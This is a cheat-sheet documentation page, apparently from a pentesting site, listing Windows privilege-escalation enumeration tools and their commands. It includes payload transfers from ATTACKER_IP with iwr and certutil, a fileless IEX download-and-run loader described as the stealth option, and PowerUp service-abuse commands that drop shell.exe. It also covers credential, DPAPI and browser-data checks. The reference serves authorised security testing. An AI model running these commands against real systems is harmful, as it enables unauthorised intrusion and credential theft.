Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

WinPEAS

Most comprehensive Windows enumeration tool.

Download

https://github.com/peass-ng/PEASS-ng/releases

# .exe (recommended)
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe -o winPEASx64.exe

# .bat (no .NET required)
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEAS.bat -o winPEAS.bat

Transfer to Target

iwr http://ATTACKER_IP/winPEASx64.exe -OutFile winPEAS.exe
certutil -urlcache -f http://ATTACKER_IP/winPEASx64.exe winPEAS.exe

Run

winPEAS.exe

Specific Checks

winPEAS.exe quiet                  # Less output
winPEAS.exe quiet systeminfo       # System info only
winPEAS.exe quiet servicesinfo     # Services only
winPEAS.exe quiet userinfo         # User info only
winPEAS.exe quiet networkinfo      # Network only
winPEAS.exe quiet applicationsinfo # Applications
winPEAS.exe quiet windowscreds     # Windows credentials
winPEAS.exe quiet browserinfo      # Browser data
winPEAS.exe quiet filesinfo        # Interesting files

Save Output

winPEAS.exe > winpeas_output.txt

Color Legend

ColorMeaning
Red95% privesc vector
YellowHigh probability
GreenUseful info
CyanInformational

PowerUp (PowerShell)

Part of PowerSploit. Checks common misconfigurations.

Download

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

Load

. .\PowerUp.ps1

IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/PowerUp.ps1')

Run All Checks

Invoke-AllChecks

Specific Checks

Get-UnquotedService
Get-ModifiableService
Get-ModifiableServiceFile
Get-ServiceUnquoted
Get-RegistryAlwaysInstallElevated
Get-RegistryAutoLogon
Get-ModifiablePath
Get-CurrentUserTokenGroupSid

Auto-exploit

Invoke-ServiceAbuse -Name 'VulnService'
Write-ServiceBinary -Name 'VulnService' -Path C:\Windows\Temp\shell.exe

Seatbelt (.NET)

Security-focused enumeration. Detailed but no auto-exploit. 
https://github.com/GhostPack/Seatbelt

Run All Checks

Seatbelt.exe -group=all

Specific Groups

Seatbelt.exe -group=system       # System info
Seatbelt.exe -group=user         # User info
Seatbelt.exe -group=misc         # Misc checks
Seatbelt.exe -group=chrome       # Chrome data

Individual Commands

Seatbelt.exe TokenPrivileges
Seatbelt.exe InterestingFiles
Seatbelt.exe CredEnum
Seatbelt.exe WindowsVault
Seatbelt.exe DpapiMasterKeys

SharpUp (.NET)

GhostPack. Checks same things as PowerUp but in C#. 
https://github.com/GhostPack/SharpUp

SharpUp.exe audit

PrivescCheck (PowerShell)

Modern alternative to PowerUp. 
https://github.com/itm4n/PrivescCheck

. .\PrivescCheck.ps1
Invoke-PrivescCheck
Invoke-PrivescCheck -Extended    # More checks
Invoke-PrivescCheck -Report PrivescCheck_report -Format HTML

JAWS (PowerShell)

Lightweight, fewer dependencies. 
https://github.com/411Hall/JAWS

. .\jaws-enum.ps1

Quick Decision

ScenarioTool
Full enumeration, .NET availableWinPEAS.exe
No .NETwinPEAS.bat or JAWS
PowerShell availablePowerUp or PrivescCheck
Need auto-exploitPowerUp (Invoke-ServiceAbuse)
Security audit detailSeatbelt
Stealth (no file on disk)IEX download + PowerUp